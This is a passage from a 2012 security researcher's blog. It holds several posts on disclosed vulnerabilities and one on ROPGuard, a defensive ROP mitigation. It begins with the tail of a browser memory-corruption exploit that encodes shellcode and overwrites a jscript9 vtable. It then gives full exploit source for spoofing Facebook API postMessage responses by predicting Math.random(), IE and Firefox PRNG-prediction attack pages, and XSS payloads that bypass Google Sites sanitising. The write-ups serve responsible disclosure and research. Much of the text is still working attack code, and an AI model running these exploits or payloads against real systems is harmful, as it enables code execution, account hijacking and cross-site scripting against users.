 arrarr[arrindex][eaxoffset + 14] = addrlo + 24 + eaxoffset*4 + 50*4;
 arrarr[arrindex][eaxoffset + 15] = addrhi;

 //encode the shellcode
 for(var i=0;i<Math.floor(shellcode.length/4);i++) {
    arrarr[arrindex][eaxoffset + 50 + i] = u2s(shellcode[i*4+3]*0x1000000 + shellcode[i*4+2]*0x10000 + shellcode[i*4+1]*0x100 + shellcode[i*4]);
 }

 //overwrite a vtable of jscript9 object and trigger a virtual call
 arrarr[arrindex][7] = addrhi;
 arrarr[arrindex][6] = addrlo + 24 + eaxoffset*4;
 //arrarr[arrindex][7] = 0x123456;
 //arrarr[arrindex][6] = 0x123456;

 //alert("done3");
 arrarr[arrindex+1].blah();
}

function run() {
 numsploits = 0;
 window.setTimeout(spray, 1000);
}

</script>
<body onload=run()>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
</body>

Saturday, September 29, 2012

Of HTML5 security, cross-domain Math.random() prediction and Facebook JavaScript API


In an earlier post, I talked about a technique called Cross-domain Math.random() prediction. And while the technique is interesting it is perhaps not intuitively clear in what cases it could be applied. So in this post I'll show an example vulnerability in Facebook which was actually the reason why I investigated this technique in the first place.

Earlier this year, I started looking at the Facebook JavaScript API to see if I can find any vulnerabilities there. What I found is that, when a user first visits the page which uses the API, the page opens a frame in the Facebook domain and this frame sends the information about the logged in user via HTML 5 postMessage mechanism. The actual vulnerability was that the API did not check the origin of this message. In other words, it didn't verify that the authentication response message actually originated from facebook.com domain, meaning that another window in another domain could send a spoofed authentication response message. Furthermore, sanity checks were not performed on the fields in the authentication response message (such as user id of the logged in user, access token etc) - the API just assumed that all of the data received is trustworthy. So in turn, if an application uses the API and assumes that all data coming from the API is trustworthy, this could lead to vulnerabilities in the application. For example, if the application uses something like

FB.getLoginStatus(function(response) {
   if (response.status === 'connected') {
      document.getElementById("greetings").innerHTML = "Some static text " + response.authResponse.userID;
   }
}

this would be OK if the user ID can only be composed of numbers, but in the case the user ID is controlled by the attacker, it could lead to XSS, for example, by sending the following as user ID

<img src=x onerror=alert(1)>

So far so good, but the problems arose when I actually attempted to exploit this. While the Facebook JavaScript API indeed didn't verify the origin of the authentication response message, when the API made an authentication request, the request contained some random numbers. These numbers were sent back in the authentication response message and the API verified that they matched. These random numbers were generated by the API using the JavaScript Math.random() function. What I found out then and described in more detail in the earlier post (http://ifsec.blogspot.com/2012/05/cross-domain-mathrandom-prediction.html) was that in some browsers in some cases, the output of Math.random() can be predicted. So in the end I was able to exploit this on an example vulnerable application. The steps of the exploit are outlined below.

1. The exploit creates a window with the vulnerable Facebook application. Let's call this window W. By creating a new window, its random number generator is initialized based on the current time. API in W gets initialized and it is expecting an authentication response message from the facebook.com domain.

2. Based on the current time, several predictions are made about the state of the random generator in W. Random parameters of the API messages are constructed based on these predictions.

3. For each PRNG state prediction, an authentication response message that contains an XSS payload in the user_id parameter is constructed. This message is sent to W.

4. IF the message sent in step 3 reaches W before the "real" authentication response message coming from the facebook.com domain, the fake message will be accepted and parsed and the real message from the facebook.com domain will be discarded.

5. If the application uses authResponse to form any HTML code and assumes authResponse is clean, the XSS payload will be executed.

The full source code of the exploit for Mozilla Firefox is given below. Note that it is based on the code given here.

<html>
  <head>
    <script>
      var maxms = 10000;
      var delay = 100;
      var appurl = "http://fratar.zemris.fer.hr/fbapp/index.html";
      
      //in order to avoid precision issues
      //we split each 48-bit number
      //into two 24-bit halves (_lo & _hi)
      var a_hi = 0x5DE;
      var a_lo = 0xECE66D;
      var b = 0x0B;
      var state_lo = 0;
      var state_hi = 0;
      var max_half = 0x1000000;
  
      //advances the state of the (previously initialized) PRNG
      function advanceState() {
        var tmp_lo,tmp_hi,carry;
        tmp_lo = state_lo*a_lo + b;
        tmp_hi = state_lo*a_hi + state_hi*a_lo;
        if(tmp_lo>=max_half) {
          carry = Math.floor(tmp_lo/max_half);
          tmp_hi = tmp_hi + carry;
          tmp_lo = tmp_lo % max_half;
        }
        tmp_hi = tmp_hi % max_half;
        state_lo = tmp_lo;
        state_hi = tmp_hi;
      }
  
      //inits PRNG
      function InitRandPredictor(seedTime) {
        var seed_lo,seed_hi;
        seed_hi = Math.floor(seedTime/max_half);
        seed_lo = seedTime%max_half;
        state_lo = seed_lo ^ a_lo;
        state_hi = seed_hi ^ a_hi;
      } 
  
      //gets the next random() result according to the predicted PRNG state
      function PredictRand() {
        var first,second;
        var num, res;
    
        advanceState();
        first = (state_hi * 4) + Math.floor(state_lo/0x400000);
        advanceState();
        second = (state_hi * 8) + Math.floor(state_lo/0x200000);
        num = first * 0x8000000 + second;
    
        res = num/Math.pow(2,53);
    
        return res;
      }      
      
      //gets the next guid() result according to the predicted PRNG state
      function PredictGuid() {
        return 'f' + (PredictRand() * (1 << 30)).toString(16).replace('.', '');
      }
      
      var w,n,guids;
      
      //starts the exploit
      function start() {
        var d = new Date();
        n = d.getTime();
        
        //generate possible guids based on the current time
        guids = new Array(maxms);
        for(var i=0;i<maxms;i++) {
          InitRandPredictor(n+i);
          guids[i] = new Array(6);
          for(var j=0;j<6;j++) {
            guids[i][j] = PredictGuid();
          }
        }

        //create a new window with the app
        w = window.open(appurl);  

        //post spoofed messages to the app
        postmessages();
      }
      
      function writeguids() {
        var i,j;
        var str = "";
        for(i=0;i<maxms;i++) {
          for(j=0;j<10;j++) {
            str += guids[i][j] + " , ";
          }
          str += "<br />";
        }
        document.getElementById("guids").innerHTML = str;
      }
  
      var messagessent, signed_request, intervalId;
  
      //posts all messages corresponding to the possible PRNG states to the vulnerable app
      function postmessage() {
        for(var i=0;i<maxms;i++) {
          message = "_FB_" + guids[i][2] + "cb=" + guids[i][5] + "&origin=blah&domain=blah&relation=parent&frame=" + guids[i][4] + "&code=1.1111111111111111.1111.1111111111.1-111111111111111111111-11111111111_111111111" + "&signed_request=" + signed_request + "&access_token=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&expires_in=1000000&https=0";
          w.postMessage(message,"*");
        }
      }
      
      //post messages after "delay" in which the vulnerable app is opened and initialized
      function postmessages() {
        messagessent = 0;
        var m1 = '{"algorithm":"HMAC-SHA256","code":"1.1111111111111111.1111.1111111111.1-111111111111111|111111111111111111111111111","issued_at":' + Math.floor(n/1000).toString() + ',"user_id":"1 <img src=x onerror=alert(1)>"}';
        signed_request = "1_11111111111111111111111111111111111111111." + window.btoa(m1);
        
        intervalId = setTimeout("postmessage()",delay);
      }
      
    </script>
  </head>
    <button onclick="start()">Click Me!</button>
    <div id="guids"></div>
  </body>
</html>


The source code of the of an example application that was used to demonstrate the vulnerability is givene below.

<html>
<head>
</head>
<body>
<div id="fb-root">
<fb:name uid="loggedinuser" capitalize="true"></fb:name>
<fb:profile-pic uid="loggedinuser"></fb:profile-pic>
</div>
<div id="greetings"></div>
<script>
  window.fbAsyncInit = function() {
    FB.init({
      appId      : '259710214039921', // App ID
      status     : true, // check login status
      cookie     : true, // enable cookies to allow the server to access the session
      xfbml      : true, // parse XFBML
      oauth      : true
    });
    
    FB.getLoginStatus(function(response) {
    if (response.status === 'connected') {
        //alert('connected,' + response.authResponse.userID);
        document.getElementById("greetings").innerHTML = "Hi! Your Facebook ID is " + response.authResponse.userID;
      } else if (response.status === 'not_authorized') {
        //alert('not_authorized');
         FB.login(function(response) {});
      } else {
        //alert('none');
         FB.login(function(response) {});
      }
     });    
 
    // Additional initialization code here
  };

  // Load the SDK Asynchronously
  (function(d){
     var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
     if (d.getElementById(id)) {return;}
     js = d.createElement('script'); js.id = id; js.async = true;
     js.src = "//connect.facebook.net/en_US/all.js";
     //js.src = "all2.js";
     ref.parentNode.insertBefore(js, ref);
   }(document));
</script>
</body>
</html>


You can see a sucessful exploit attempt in the image below.



Facebook adressed this issue and now the API checks the origin of incoming messages.

Sunday, August 26, 2012

My BlueHat Prize entry: ROPGuard - runtime prevention of return-oriented programming attacks


In my previous (brief) post I was very excited to announce that ROPGuard, a system for runtime prevention of return-oriented programming attacks that I designed, was selected as one of the top three entries in the Microsoft's BlueHat Prize contest. I also promised to publish more details about my entry.

In the meantime, at Microsoft's party following the Black Hat USA 2012 conference, the winners of the contest were announced and my project was awarded a second prize, which I'm very happy about. In case you missed the party, you can see the recording of the awarding ceremony here. Once again, congratulations to Vasilis Pappas for winning the contest!

I planned to write more about ROPGuard sooner, but it was a really eventful month for me (more on that in a later post) and so this always got pushed back. Now, finally, I'm happy to announce that I published the entire project on Google Code. You can find all of the source and project files as well as the project documentation here.

In the remainder of this post, I'll write a brief retrospect of my project and give some thoughts on what I intended to accomplish, what problems I faced, what went right, what went wrong etc.

First of all, I'd like to say a few words about the problem I attempted to solve: Return-Oriented Programming (ROP). It is the current state of the art technique used in exploit development to bypass Data Execution Protection (DEP). Preventing ROP is very difficult - I couldn't claim it's the most difficult problem of those that would be applicable in the contest as I haven't actually attempted to solve any of the others, but it's certainly very difficult and certainly a burning issue in the exploit prevention. Despite all of my efforts, as well as the efforts of other BlueHat Prize finalists and other researcher, the problem is still open.

In general, previously proposed solutions for ROP fall in one of several groups, each with its drawbacks. Firstly, there are solutions based on the dynamic instrumentation. The drawback of these solutions is that they add a significant performance overhead. The second group are the compiler-based solutions. Although there are some really comprehensive compiler-based solutions, in general, for the compiler-level solution to be applied, we need to have the source code of each of the executable modules and the solution needs to be applied to every module in the process in order for the protection to work. And finally, there are solutions based on static binary rewriting, the drawback of these approaches being their reliance on automatic reverse engineering, which is error prone and any error will most likely affect the stability of the protected application.

Instead of following one of these approaches, what I attempted to do is use as much information as possible already existing in the running process to try to differentiate ROP attempts from normal code execution. One of the main ideas behind ROPGuard is that, in order to be able to execute arbitrary code or escape the current process, the attacker must call one from the finite set of functions from the ROP code. I called these functions "critical functions". For example, to execute arbitrary code, the commonly used ROP chains call functions such as VirtualProtect and VirtualAlloc, but others such as HeapCreate or LoadLibrary can be used as well etc. This leads to the idea to run the checks only when one of these functions gets called to check if it was called from the ROP code or as a result of normal program execution. This way, a protective system with a very low computational overhead can be created.

Now let's look at the checks that ROPGuard performs. There are many simple checks such as:
 - checking whether the value of the stack pointer is valid
 - checking if the address of the current function is on the stack (which could mean that it was entered via RETN instead of CALL)
 - checking if the instruction preceding the one at the return address of the critical function is a CALL instruction
 - some function-specific checks, such as checking if the VirtualProtect function is called to change the access rights of the stack

But besides those relatively simple checks, the other major idea was to check if there is a valid call stack leading to the execution of the current (critical) function.

When one thinks of checking the call stack, the first idea that comes to mind is using the frame pointer (EBP register) to do it. After all, that's how the call stack is usually reconstructed. However, in order for this to work the program must use EBP register as a frame pointer and this is in no way mandatory - many programs omit frame pointers in favor of using the EBP register as an additional general-purpose register. So, in conclusion, call stack check based on the frame pointers could be used to check the validity of the call stack, but only if the program is compiled in such a way that frame pointers are not omitted. ROPGuard has an option to perform these checks and they can be turned on for programs compiled in such a way for greater protection (another good thing about ROPGuard is its configurability).

But, in general, an alternative to frame pointes was needed to reconstruct the call stack. My initial idea to do that was as follows: starting at the current instruction we trace the instructions until we reach the RETN instruction. On the way, we also simulate all instructions that modify the stack pointer (such as PUSH, POP, ADD ESP,# etc.) and update the information about the size of the current stack frame. On RETN we perform the appropriate checks and continue again from the return address (see the original documentation for details). In general, there are several problems with this idea. The first one is functions that dynamically determine the frame size, but such functions are relatively scarce in most programs. The second problem is the stdcall calling convention (and possibly other calling conventions where the callee is responsible for cleaning the stack). The functions that follow these conventions will actually modify the frame size of the caller function. So when we reach the CALL instruction, in general we can't know how the stack pointer will be modified after the call. Sure, we could follow into the function and look for the RETN n instruction, but there's another problem: indirect calls. When we reach an indirect call, unless we simulate the entire instruction set, we won't know the CALL target and so we also won't know how this call will modify the stack pointer. ROPGuard takes a very simple approach around this - it will break the simulation on CALL instructions and other instructions where it can't properly resolve the stack pointer. However, if you look at the commonly used ROP chains such as those in http://www.corelan.be/index.php/security/corelan-ropdb/, you'll notice that they actually don't usually use indirect calls except for calling functions that we may consider critical functions and we already got those covered (as all checks are called again on every critical function call). So ROPGuard will easily detect the currently used ROP chains using this approach. Note that another approach could be to simulate the entire instruction set instead of only the instructions that modify the stack pointer, however, this would be much more expensive in terms of system resources.

So, to conclude, ROPGuard should not be considered a complete solution for ROP, but can easily detect currently used ROP chains. Additionally, one of the best features of ROPGuard is its practicality: It has a very low computational (about 0.5% on average) and memory overhead and can be applied at runtime to any process, even if this process is already running. These, among with the relative simplicity of integrating ROPGuard into other tools, are probably the reasons that, among all of the other entries, Microsoft decided to implement techniques used in ROPGuard into their EMET tool.

I'd also like to thank Elias Bachaalany of Microsoft for not only implementing ROPGuard technology into EMET but also improving it in every way. In fact, due to various reliability improvements I recommend using EMET instead of my own prototype implementation.

I am aware that ROPGuard is not perfect and if the attacker is aware of ROPGuard and has enough skill, he/she would be able to construct special ROP chains that would, so to speak, push ROPGuard off guard. In fact, this protection has already been defeated once. Although this particular attack can be prevented by implementing the same protections for the system calls as well as for user-mode functions, there are other ways to bypass the proposed checks. However, as attack techniques improve, so do the defenses and I hope that my work, in addition to other existing defense-oriented research, will help others to come up with better ideas. Personally, despite all my experience in offensive-oriented security research, I'd be much more impressed if someone came up with a way to improve the techniques described in my work rather than a way to break them.


Sunday, June 24, 2012

ROPGuard selected as one of the top three entries in Microsoft's BlueHat Prize contest


Earlier this year, I participated in Microsoft's BlueHat Prize contest - a contest to design a novel runtime mitigation technology designed to prevent the exploitation of memory safety vulnerabilities. A few days ago, Microsoft revealed the names of the three finalists, and I'm very happy to be one of them, together with Jared DeMott and Vasilis Pappas. Microsoft is taking the finalists to BlackHat USA 2012 conference in Las Vegas, where the winners will be announced on July 26.

My entry is called ROPGuard - it is a system for runtime prevention of Return-Oriented Programming (ROP) attacks.  ROPGuard can detect currently used ROP exploits, it can be applied at runtime to any process and has a very low processing and memory overhead. This is going to be a very short post, but I'll most likely publish more info about my entry later, so if you're interested in more details, check back later on. You can also find a short interview with me and the other two finalists here.

Thursday, June 14, 2012

Stored XSS in Google Sites


I was recently introduced to an interested project called Google Caja. Google Caja is basically a compiler/sandbox that makes user-supplied HTML/JavaScript/CSS safe to embed in your web app. Among other places, it is used in Google Sites and Yahoo Applications. The project is very interesting for a number of reasons from a security research standpoint, and one of those is that a bug in the compiler could lead to a stored XSS in Google sites.

So I played with it a bit to see if I can find any holes. I first found a few bugs that are not exploitable on Google Sites and reported those directly to the Google Caja team. These bugs are not yet fixed so I won't write about them at this time. However, when trying to exploit one of those bugs on Google Sites, I discovered another issue there related to the parsing of user-supplied HTML. This issue can be used to cause a stored XSS in sites.google.com.

In order to understand the issue, let's first look at how Google Sites handled some of the user-supplied HTML input.
Let's say that we entered something like this:

<noembed><![CDATA[ <script>alert(document.cookie)</script> ]]></noembed>

It would remain pretty much the same and the JavaScript would not get executed. This is the correct behavior as, in the noembed tag, HTML special characters are interpreted literally. Now, if we entered something like

<noembed><![CDATA[ </noembed><script>alert(document.cookie)</script> ]]></noembed>

The parsing would fail. This is again the correct behavior, because the browsers would interpret the first occurrence of </noembed> as the closing tag despite it being in the CDATA tag. Thus, if something like that passed unchanged, the script would get executed. The actual problem stems from having multiple CDATA tags in a single noembed tag (or other tags that interpret special HTML characters literally). So for example

<noembed><![CDATA[aaa]]><![CDATA[bbb]]></noembed>

would become

<noembed><![CDATA[aaabbb]]></noembed>

Considering everything written so far, it shouldn't be hard to combine it into a working exploit:

<noembed><![CDATA[ <]]><![CDATA[/noembed><script>alert(document.cookie)</script> ]]></noembed>

When parsing the HTML code above, the two CDATA blocks would get merged and, in doing so, a new closing </noembed> tag would be formed. Thus, the noembed tag would get closed before expected, and the content of the script tag would get executed. This is shown in the image below.



This issue was quickly resolved by the Google security team and now the HTML special characters are escaped even in noembed and similar tags. Thanks!

PS If you thought that my previous post about PRNG predictability in browsers is related to Google, I'll have to disappoint you - you'll have to wait a bit longer to find out just how I used that :-)

Thursday, May 31, 2012

Cross-domain Math.random() prediction


I recently descovered an interesting security issue in a web application that could be potentially exploited if an attacker could guess the values generated by JavaScript's Math.random() function running in a window in the web app's domain. So, I was wondering could the values returned by the Math.random() in one window in one domain be predicted from another window in another domain. Surprisingly, the answer is "yes". At least if you use Firefox or Internet explorer 8 and below. The technique that does this is called Cross-domain Math.random() prediction.

The JavaScript Math.random() weaknesses in different browser are nothing new. Amit Klein wrote extensively abot them [1, 2, 3]. However, while he does mention Cross-domain Math.random() prediction in his paper [1], the focus of his writing is more on using these weaknesses to track user across multiple websites. That's why in this post I'm going to show more details about this particular technique (Cross-domain Math.random() prediction) and also show the current state of the web browsers regarding the Math.random() predictability. In this post, I'll write about the attack in general and in a subsequent post, I'll show an example vulnerable application (once it gets patched).

In general, to use the attack, the following conditions must be met:

1. A web page in some domain uses Math.random() to generate a number.
2. An attacker can somehow gain from knowing this number.
3. An attacker can choose when this number will be generated (for example, by opening a window with a vulnerable application).

Take for example a web page that generates a random number which is then used to identify a user when talking to the web application server.

Now, let's see what makes the attack possible.

The pseudo-random number generator (PRNG) implementations in Internet Explorer up to IE 9 and Firefox are relatively simple and are described in detail in [1] and [3], respectively. The main points to keep in mind are:

1. Both implementations are based on seeding the 48-bit PRNG state based on the current time (in milliseconds) and the state is updated as (state*a+b)%(2^48), where a and b are constant numbers.

2. In Firefox, PRNG seeding is actually done based on the value obtained by xoring the current time in milliseconds with another number which is obtained by xoring two pointers. However, I have observed that these pointers are usually very similar so the result of the xor operation between them is usually a very small number (<1000). This means that, for practical purposes, we may consider that PRNG state in Firefox is seeded based on the current time in milliseconds +/- 1000.

3. In Firefox, each page will have its own PRNG while in IE 8 and below each tab will have its own PRNG and the PRNG will *not* be reseeded if the page in the tab changes, even though the new page might be in another domain.

This opens two possible algorithms for cross-domain Math.random() prediction, where one will work on IE only, and the other will work on both IE and Firefox. The attacks are described below. The code that demonstrates both attacks can be found in the "Example code" section below.

First attack (IE 8 and below only)

This version of the attack exploits the fact that IE does not reseed the PRNG for every page in the same tab. It works as follows:

1. The attacker gets a user to visit his page
2. The attacker's page generates a random number and uses it to compute the current state of the PRNG
3. The state of the PRNG is sent to the attacker. It can be used to predict the result of any subsequent Math.random() call made in the same browsing tab.
4. The attacker's page redirects the victim to the vulnerable application

Second attack (IE8 and below, Firefox)

This version of the attack is based on guessing the seed value of the PRNG and works as follows:

1. The attacker gets a user to visit his page
2. The page makes a note of the current time, t, and opens a new window with the vulnerable application.
3. Based on t, a guess is made for the PRNG seed value in the new window. If the guess is correct, the attacker can predict the result of Math.random() calls in the new window.

Note that this attack relies on guessing the seed value. Since seeding is done based on the current time in milliseconds, this means that, if we can make multiple guesses, we have a pretty good chance of guessing correctly. For example, if we can predict PRNG seeding time up to a second, we have about 1/1000 chance of guessing correctly in IE and somewhat smaller chance (but usually in the same order of magnitude) for guessing correctly in Firefox. If we can make several hundreds of guesses, this is a pretty good chance, especially considerning that the PRNG state in IE and Firefox has 48 bits.

Other browsers

Internet Explorer 9 is not vulnerable to this type of attack because
 - Each page has its own PRNG and
 - PRNG seeding is based on the high-precision counter and additional entropy sources [2].

Google Chrome on Windows also isn't vulnerable to this type of attack because
 - Each page has its own PRNG and
 - PRNG seeding is based on the rand_s function which is cryptographically secure [4, 5].

Example code

"rand.html". This page just generates the random number and displays it. The goal of the two "exploit" pages below is to guess it.
<html>
<head>
  <script>
    document.write("I generated: " + Math.random());
  </script>
</head>
<body>
</body>
</html>


"exploit1.php". This page uses the first attack (IE only) to predict Math.random() value in another domain, but in the same tab. It uses "decodestate.exe" to decode the current state of the PRNG.
<?php 
if (isset($_REQUEST['r']))
{
  $state = exec("decodestate.exe ".$_REQUEST['r']);

?>

<html>
<head>
<script>
  //target page, possibly in another domain
  var targetURL = "http://127.0.0.1/rand.html"
  
  var a_hi = 0x5DE;
  var a_lo = 0xECE66D;
  var b = 0x0B;
  var state_lo = 0;
  var state_hi = 0;
  var max_half = 0x1000000;

  //advances the state of the (previously initialized) PRNG
  function advanceState() {
    var tmp_lo,tmp_hi,carry;
    tmp_lo = state_lo*a_lo + b;
    tmp_hi = state_lo*a_hi + state_hi*a_lo;
    if(tmp_lo>=max_half) {
      carry = Math.floor(tmp_lo/max_half);
      tmp_hi = tmp_hi + carry;
      tmp_lo = tmp_lo % max_half;
    }
    tmp_hi = tmp_hi % max_half;
    state_lo = tmp_lo;
    state_hi = tmp_hi;
  }

  //gets the next random() result according to the predicted PRNG state
  function PredictRand() {
    var first,second;
    var num, res;
    
    advanceState();
    first = (state_hi * 8) + Math.floor(state_lo/0x200000);
    advanceState();
    second = (state_hi * 8) + Math.floor(state_lo/0x200000);
    num = first * 0x8000000 + second;
    
    res = num/Math.pow(2,54);
  
    return res;
  }

  function start() {
    var state = <?php echo($state); ?>;
    state_hi = Math.floor(state/max_half);
    state_lo = state%max_half;
    
    alert("I predicted : " + PredictRand());
    
    window.location = targetURL;
  }
  
</script>
</head>
<body onload="start()">
</body> 
</html>

<?php } else { ?>

<html>
<head>
<script> 
  function start() 
  { 
    document.forms[0].r.value=Math.random();
    document.forms[0].submit();
  }
</script>  
</head>
<body onload="start()"> 
<form method="POST" onSubmit="f()"> 
<input type="hidden" name="r"> 
</form> 
</body> 
</html>

<?php } ?>


The code for "decodestate.exe". Much of it is shamelessly copied from [1].
#include <stdlib.h> 
#include <stdio.h> 

#define UINT64(x) (x##I64)
typedef unsigned __int64 uint64; 
typedef unsigned int uint32; 

#define a UINT64(0x5DEECE66D)
#define b UINT64(0xB)

uint64 adv(uint64 x)
{ 
  return (a*x+b) & ((UINT64(1)<<48)-1);
} 

int main(int argc, char* argv[])
{ 
  double sample=atof(argv[1]);
  uint64 sample_int=sample*((double)(UINT64(1)<<54));
  uint32 x1=sample_int>>27;
  uint32 x2=sample_int & ((1<<27)-1);

  for (int v=0;v<(1<<21);v++)
  {
    uint64 state=adv((((uint64)x1)<<21)|v);
    uint32 out=state>>(48-27);
    if ((sample_int & (UINT64(1)<<53)) && (out & 1))
    {
      // Turn off least significant bit (which we know is 1). 
      out--;
      // Perform Round to Nearest (even number, but keep in mind that
      // we don't count the least significant bit)
      if (out & 2)
      {
        out+=2;
      }
    }
    if (out==x2) {
      printf("%lld\n",state);
      return 0;
    }
  }
  // Not found
  printf("-1\n");
  return 0;
}


"exploit2.html". This page uses the second attack (both IE and Firefox) to predict Math.random() value in another domain in another window. Multiple predictions are made of which one is usually correct (depending on the time it takes a browser to open a new window and additional entropy in Firefox).
<html>
  <head>
    <script>
      //target page, possibly in another domain
      var targetURL = "http://127.0.0.1/rand.html"
      
      //in order to avoid precision issues
      //we split each 48-bit number
      //into two 24-bit halves (_lo & _hi)
      var a_hi = 0x5DE;
      var a_lo = 0xECE66D;
      var b = 0x0B;
      var state_lo = 0;
      var state_hi = 0;
      var max_half = 0x1000000;
      var max_32 = 0x100000000;
      var max_16 = 0x10000;
      var max_8 = 0x100;
  
      //advances the state of the (previously initialized) PRNG
      function advanceState() {
        var tmp_lo,tmp_hi,carry;
        tmp_lo = state_lo*a_lo + b;
        tmp_hi = state_lo*a_hi + state_hi*a_lo;
        if(tmp_lo>=max_half) {
          carry = Math.floor(tmp_lo/max_half);
          tmp_hi = tmp_hi + carry;
          tmp_lo = tmp_lo % max_half;
        }
        tmp_hi = tmp_hi % max_half;
        state_lo = tmp_lo;
        state_hi = tmp_hi;
      }
  
      function InitRandPredictor(seedTime) {}
  
      //inits PRNG
      function InitRandPredictorFF(seedTime) {
        var seed_lo,seed_hi;
        seed_hi = Math.floor(seedTime/max_half);
        seed_lo = seedTime%max_half;
        state_lo = seed_lo ^ a_lo;
        state_hi = seed_hi ^ a_hi;
      } 
  
      //inits PRNG
      function InitRandPredictorIE(seedTime) {
        var pos=[17,19,21,23,25,27,29,31,1,3,5,7,9,11,13,15,16,18,20,22,24,26,28,30,0,2,4,6,8,10,12,14];
        var timeh,timel1,timel2,statel,stateh1,stateh2,tmp1,tmp2;
        timeh = Math.floor(seedTime/max_32);
        timel1 = Math.floor((seedTime%max_32)/max_16);
        timel2 = seedTime%max_16;
        statel = timeh ^ timel2;
        tmp1 = timel1 ^ 0xDEEC;
        tmp2 = timel2 ^ 0xE66D;
        stateh1 = 0;
        stateh2 = 0;
        for(var i=0;i<16;i++) {
          if(pos[i]<16) {
            stateh2 = stateh2 | (((tmp2>>i)&1)<<pos[i]);
          } else {
            stateh1 = stateh1 | (((tmp2>>i)&1)<<(pos[i]-16));
          }
        }
        for(var i=16;i<32;i++) {
          if(pos[i]<16) {
            stateh2 = stateh2 | (((tmp1>>(i-16))&1)<<pos[i]);
          } else {
            stateh1 = stateh1 | (((tmp1>>(i-16))&1)<<(pos[i]-16));
          }
        }
        state_hi = (stateh1<<8) + Math.floor(stateh2/max_8);
        state_lo = ((stateh2%max_8)<<16) + statel;
      } 

      function PredictRand() { return(-1); }

      //gets the next random() result according to the predicted PRNG state
      function PredictRandFF() {
        var first,second;
        var num, res;
    
        advanceState();
        first = (state_hi * 4) + Math.floor(state_lo/0x400000);
        advanceState();
        second = (state_hi * 8) + Math.floor(state_lo/0x200000);
        num = first * 0x8000000 + second;
    
        res = num/Math.pow(2,53);
    
        return res;
      }      
  
      //gets the next random() result according to the predicted PRNG state
      function PredictRandIE() {
        var first,second;
        var num, res;
    
        advanceState();
        first = (state_hi * 8) + Math.floor(state_lo/0x200000);
        advanceState();
        second = (state_hi * 8) + Math.floor(state_lo/0x200000);
        num = first * 0x8000000 + second;
    
        res = num/Math.pow(2,54);
      
        return res;
      }      
      
      function start() {
        var msfrom,msto;
        
        //simple browser detection
        if(navigator.userAgent.indexOf("MSIE 8.0")>=0) {
          InitRandPredictor = InitRandPredictorIE;
          PredictRand = PredictRandIE;
          msfrom = 0;
          msto = 1000;
        } else if(navigator.userAgent.indexOf("Firefox")>=0) {
          InitRandPredictor = InitRandPredictorFF;
          PredictRand = PredictRandFF;
          //greater range for FF to deal with extra entropy
          msfrom = -1000;
          msto = 2000;
        } else {
          alert("Sorry, your browser is not supported");
          return;
        }
        
        var d = new Date();
        var t = d.getTime();
        
        var w = window.open(targetURL);
        
        var predictions = "At time " + t.toString() + " I predicted: <br />";
        for(var i=msfrom;i<msto;i++) {
          InitRandPredictor(t+i);
          //InitRandPredictor(1338400821077);
          predictions += PredictRand() + "<br />";
        }
        
        document.getElementById("prediction").innerHTML = predictions;    
      }
      
    </script>
  </head>
    <button onclick="start()">Click Me!</button>
    <br/>
    <div id="prediction">
  </body>
</html>


References

[1] http://www.trusteer.com/sites/default/files/Temporary_User_Tracking_in_Major_Browsers.pdf
[2] http://www.trusteer.com/sites/default/files/VM_Detection_and_Temporary_User_Tracking_in_IE9_Platform_Preview.pdf
[3] http://www.trusteer.com/sites/default/files/Cross_domain_Math_Random_leakage_in_FF_3.6.4-3.6.8.pdf
[4] http://msdn.microsoft.com/en-us/library/sxtz2fa8(v=vs.80).aspx
[5] http://en.wikipedia.org/wiki/CryptGenRandom

Monday, March 12, 2012

Two Facebook vulnerabilities

A while ago I realized that it's been a long time since I wrote about the web application security here, so when Facebook announced their security bug bounty program it seemed like a perfect opportunity to show off some web application security research. In this post I'll show the two bugs I found on Facebook (so far). Both bugs have been fixed on February 31st, 2012. Although these two bugs are not nearly as critical as the ones I usually write about on this blog (which just gives me further motivation to get back to Facebook bug hunting when I catch some time off my other projects, hopefully you'll read about some of those here as well), I think that they still might be interesting to other security researcher working on Facebook and web application security in general. So, without further ado:

Bug #1: Breaking the group docs parser

While examining the group docs parser I noticed an interesting way in which it handles images uploaded to group docs. Every image uploaded to a group doc gets represented in the form

(img:id)

where id is the id number of the uploaded image, for example

(img:107037326063026)

When the doc is displayed to the user, the above notation will get changed to the appropriate img html tag, for example

<img src="http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/251997_107037326063026_608256_a.jpg" ... />

So, if we edit a Facebook group doc and add the text '(img:id)', where id should be an actual image id, it will be changed to appropriate '<img src=.../>' tag when the doc is displayed.

In itself this is not a problem, but the bug reveals itself if we intercept a HTTP request when editing a group doc and put something like this in the doc body

<a href='http://www.somewebsite.com/#(img:107037326063026)'></a>

When such group doc gets displayed, the above will be changed to

<a href="http://www.somewebsite.com/#<img src="http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/251997_107037326063026_608256_a.jpg" fbid="107037326063026" hmac="ATqmQ6bijjIvXRta" />&quot; onmousedown=&quot;UntrustedLink.bootstrap($(this), &quot;4AQFWDRA8&quot;, event, bagof(null));&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;</a>

So again the (img:...) is replaced by <img src=.../> even though it is now contained in the 'href' property of a html anchor element

An example of this is shown in the image below


Note that the double quote opened at 'href="' is now closed by the quote in 'img src="' and that the 'a' tag is now closed by the '>' character actually belonging to the 'img' tag, thus breaking the page DOM.

So, why could this be considered a security issue? Firstly, note that normally, when you click any user-submitted link on Facebook, you don't get redirected to the link target immediately. Instead, the link is first sanitized through www.facebook.com/l.php script. This is accomplished by adding an onmousedown property to every anchor element. However, note that the above trick closes the anchor tag before the onmousedown property gets declared, thus the link sanitation is bypassed if anyone clicks this link.

Secondly, let's assume that Facebook development team makes one tiny, seemingly innocent, change in the future and allow the user to control any html property of the image added to the group doc. If something like this ever happened, this bug would become a stored XSS which, for a site like Facebook with its billion users might be considered a serious problem. Let's see how.

In this case, if the user could control some image property and add the image that would be rendered as

